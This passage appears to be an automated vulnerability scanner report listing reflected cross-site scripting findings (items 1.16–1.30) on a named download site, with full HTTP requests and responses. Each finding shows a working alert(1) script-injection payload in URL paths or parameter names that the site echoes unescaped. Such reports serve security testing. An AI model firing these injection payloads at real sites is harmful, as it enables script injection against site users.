Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A17%3A%22binary-downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A17%3A%22binary+downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-binary-downloader-downloads.html?f33c0"><script>alert(1)</script>a7faec4549f=1" />
...[SNIP]...

1.16. http://www.x64bitdownload.com/64-bit-binary-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binary-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d254"><script>alert(1)</script>67bb66d1da1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-binary-downloads.html6d254"><script>alert(1)</script>67bb66d1da1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:42:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:52:48 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-binary-downloads.html6d254"><script>alert(1)</script>67bb66d1da1" />
...[SNIP]...

1.17. http://www.x64bitdownload.com/64-bit-binary-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binary-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5d5c"><script>alert(1)</script>01d31414795 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-binary-downloads.html?a5d5c"><script>alert(1)</script>01d31414795=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-binary-downloads.html?a5d5c"><script>alert(1)</script>01d31414795=1" />
...[SNIP]...

1.18. http://www.x64bitdownload.com/64-bit-board-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-board-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c7db"><script>alert(1)</script>387ba0d9d20 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-board-downloads.html3c7db"><script>alert(1)</script>387ba0d9d20 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:00:44 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:58 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-board-downloads.html3c7db"><script>alert(1)</script>387ba0d9d20" />
...[SNIP]...

1.19. http://www.x64bitdownload.com/64-bit-board-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-board-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 123df"><script>alert(1)</script>9a9ef9bad1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-board-downloads.html?123df"><script>alert(1)</script>9a9ef9bad1b=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:19 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-board-downloads.html?123df"><script>alert(1)</script>9a9ef9bad1b=1" />
...[SNIP]...

1.20. http://www.x64bitdownload.com/64-bit-boards-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-boards-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1044f"><script>alert(1)</script>58b87c63170 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-boards-downloads.html?1044f"><script>alert(1)</script>58b87c63170=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:44 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22boards%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22boards%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-boards-downloads.html?1044f"><script>alert(1)</script>58b87c63170=1" />
...[SNIP]...

1.21. http://www.x64bitdownload.com/64-bit-client-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-client-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 107a5"><script>alert(1)</script>5d3bbdbca7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-client-downloads.html107a5"><script>alert(1)</script>5d3bbdbca7a HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:45:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:55:32 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-client-downloads.html107a5"><script>alert(1)</script>5d3bbdbca7a" />
...[SNIP]...

1.22. http://www.x64bitdownload.com/64-bit-client-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-client-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44255"><script>alert(1)</script>7cf0f112265 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-client-downloads.html?44255"><script>alert(1)</script>7cf0f112265=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:42:08 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:52:26 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-client-downloads.html?44255"><script>alert(1)</script>7cf0f112265=1" />
...[SNIP]...

1.23. http://www.x64bitdownload.com/64-bit-conference-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-conference-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32275"><script>alert(1)</script>ad9b1cf51f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-conference-downloads.html?32275"><script>alert(1)</script>ad9b1cf51f1=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:38 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22conference%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22conference%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-conference-downloads.html?32275"><script>alert(1)</script>ad9b1cf51f1=1" />
...[SNIP]...

1.24. http://www.x64bitdownload.com/64-bit-cross-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-cross-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9436b"><script>alert(1)</script>9d161df1015 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-cross-downloads.html9436b"><script>alert(1)</script>9d161df1015 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:43:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:53:18 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-cross-downloads.html9436b"><script>alert(1)</script>9d161df1015" />
...[SNIP]...

1.25. http://www.x64bitdownload.com/64-bit-cross-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-cross-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6bda"><script>alert(1)</script>b40157044c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-cross-downloads.html?e6bda"><script>alert(1)</script>b40157044c5=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:49 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-cross-downloads.html?e6bda"><script>alert(1)</script>b40157044c5=1" />
...[SNIP]...

1.26. http://www.x64bitdownload.com/64-bit-download-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-download-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8728"><script>alert(1)</script>1a0285ae469 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-download-downloads.htmlb8728"><script>alert(1)</script>1a0285ae469 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-download-downloads.htmlb8728"><script>alert(1)</script>1a0285ae469" />
...[SNIP]...

1.27. http://www.x64bitdownload.com/64-bit-download-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-download-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51f31"><script>alert(1)</script>f94cfc1ffad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-download-downloads.html?51f31"><script>alert(1)</script>f94cfc1ffad=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:43:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:53:31 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-download-downloads.html?51f31"><script>alert(1)</script>f94cfc1ffad=1" />
...[SNIP]...

1.28. http://www.x64bitdownload.com/64-bit-downloader-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-downloader-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e057"><script>alert(1)</script>bfedfe770d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-downloader-downloads.html1e057"><script>alert(1)</script>bfedfe770d3 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:02 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-downloader-downloads.html1e057"><script>alert(1)</script>bfedfe770d3" />
...[SNIP]...

1.29. http://www.x64bitdownload.com/64-bit-downloader-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-downloader-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cabf"><script>alert(1)</script>1c16e82e365 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-downloader-downloads.html?6cabf"><script>alert(1)</script>1c16e82e365=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:05:10 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-downloader-downloads.html?6cabf"><script>alert(1)</script>1c16e82e365=1" />
...[SNIP]...

1.30. http://www.x64bitdownload.com/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feff5"><script>alert(1)</script>b66c185e6a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.htmlfeff5"><script>alert(1)</script>b66c185e6a5 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:08 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A32%3A%22ext2fs-ext3fs-paragon-extbrowser%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A32%3A%22ext2fs+ext3fs+paragon+extbrowser%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
